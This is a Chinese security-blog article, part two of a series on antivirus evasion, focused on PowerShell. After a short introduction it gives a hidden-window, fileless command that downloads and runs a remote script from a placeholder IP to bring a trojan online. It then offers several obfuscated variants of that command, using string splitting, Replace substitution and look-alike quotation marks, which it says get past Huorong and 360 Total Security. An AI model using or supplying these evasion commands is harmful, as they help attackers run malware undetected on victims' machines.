『免杀系列』免杀技术(二) – 作者:宸极实验室Sec-安全小百科

0x00 前言

之前文章写了一点免杀方面的知识，主要包括了C/C++、python语言的免杀思路。之前文章写的时候，360安全卫士是12版本，可能由于最近的某项活动，现在360升级13版本，规则做了更改，可能有些思路已经无法实现，这篇文章主要讲解一些powershell方面的免杀知识。

0x01 PowerShell 简介

Windows PowerShell是一个命令行管理程序，相比较于CMD命令行，它更为强大，同时，它又是一种脚本语言，为系统管理设计。在.NET Framework的基础上构建，简单来说，可以类比UNIX系统的脚本(shell)。

2002年，微软研究了一个新的产品Monad，在2005年发布第一个版本，到2006年被重命名为Windows PowerShell，目前微软官网文档，已经更新到7.2版本，第一款默认集成PowerShell的系统版本是Windows Server 2008。

0x02 PowerShell 免杀

上一部分提到，Windows PowerShell是一种脚本语言，那么通过这种语言，可以完成很多系统管理操作，同时也为攻击者提供了一种利用思路。

现在利用思路大都是利用其实现与远端IP进行通信，利用其传递木马执行实现肉鸡上线。其最主要优点就是，无文件落地，痕迹只存在于内存进程之中，隐蔽性较强。

#PowerShell 下载执行
powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://XX.XX.XX.XX/1.ps1'))"

当然，像这种明目张胆通过公网IP地址下载并执行木马脚本，肯定会被杀毒软件所拦截。目前杀软对PowerShell中的参数和函数进行监测，我们可以通过逐个拆分进行探测杀软监测规则。

通过上图可以发现，火绒对hidden参数进行了监测。以此类推，逐个排查，对PowerShell语句进行改进、变换、拼接等操作，实现免杀。

0x03 干货分享

接下来分享一些可绕过最新版本火绒，以及360安全卫士12.X版本的PowerShell语句。

# 拆分DownloadString函数 + echo 过最新版火绒 + 360 12.X版本
cmd /c echo $c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://XX.XX.XX.XX/test.ps1'')'.Replace('123','adString');IEX ($c1+$c2) | powershell -

# 拆分http关键字，过360 12.X版本
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

#通过中文引号，绕过360 12.X版本
powershell "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://XX.XX.XX.XX/test.ps1'))"

# 替换IEX + http拆分 绕过最新版火绒
powershell "$a='123((New-Object Net.WebClient).DownloadString(''ht'.Replace('123','IEX');$b='tp://XX.XX.XX.XX/test.ps1''))';IEX ($a+$b)"

以上只是我在写这篇文章的时候，随手测试的几种绕过方式，其实绕过方式还有很多很多，只要自己肯去排列组合各种可能性，可能大家都能达到免杀效果。只是通过上面的几个实例和大家探讨一下基本的PowerShell免杀思路。

而且PowerShell不仅仅可以做到木马执行上线CS操作，还可以做提权、加用户等利用方式，有兴趣的可以自己探索一下。